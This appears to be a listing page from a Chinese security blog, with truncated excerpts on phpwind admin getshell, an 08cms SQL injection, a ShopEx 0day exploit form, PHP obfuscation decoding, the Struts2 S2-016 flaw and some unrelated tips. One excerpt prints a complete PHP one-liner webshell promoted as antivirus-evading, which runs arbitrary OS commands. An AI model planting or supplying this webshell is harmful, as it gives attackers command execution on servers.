体验盒子

不再关注网络安全

如何下载 Chrome 应用商店的 .crx 文件

Chrome Extension Downloader 是一个可以下载到 Chrome 应用商店扩展 .crx 文件的网站,直接输入 Chrome 扩展地址就能得到 .crx 文件。 .crx 文件是 Chrome ...

phpwind后台getshell

后台上传插件处,可以上传一个包含php木马的phpwind标准格式插件安装包,并可getshell. 1.先制作一个安装包,需要包含一个manifest.xml文件和一个php一句话(...

08cms SQL 注入漏洞利用

来源:www.08sec.com 汽车的: /include/paygate/alipay/pays.php 1234567891011121314151617181920212223242526...

用JS给XP的右键加上“打开文件位置”

在WIN7中有了这个功能,并且感觉很好用,但在XP中没有这样的功能,以前都是用BAT实现的,今天扔个JS实现的: 12...

网络原创版权问题

无论是在传统时代还是网络时代,著作权法的立法精神都没有变,那就是保护创新、激励创新,平衡创作者、传播者、使用者之间的利益。 网络时代尊重他人的原创劳...

河马php一句话木马[过狗版]v1.0

河马php一句话木马[过狗版]v1.0

【河马】 php一句话木马服务端和客户端【免杀版】 软件是一个php脚本木马,将<?php echo $_GET[2]($_GET[0]($_GET[1]));?> 写入文件webshell.php中,然后使用软件进行连接,就可以执行OS命令, 支持的函数...

椰树1.8 web漏洞扫描器

好像更新蛮多的,直接贴地址吧,下载地址

shopex 4.8.5 api.php注入漏洞0day exp

123456789  <form method='post' action='http://www.site.com/api.php?act=search_dly_type...

$O00OO0=urldecode 解密

  • 2013-07-23
  • PHP

网站服务器太烂了吧,最近一年都频繁打不开,恶心死,烦…… 微盾类似解密,一般都以 123  <?ph...

Struts2再爆远程代码执行漏洞(S2-016)

Struts2再爆远程代码执行漏洞(S2-016)

Struts又爆远程代码执行漏洞了!在这次的漏洞中,攻击者可以通过操纵参数远程执行恶意代码。Struts 2.3.15.1之前的版本,参数action的值redirect以及redirectAction没有正确过滤,导致ognl代码执行。 目录表 T...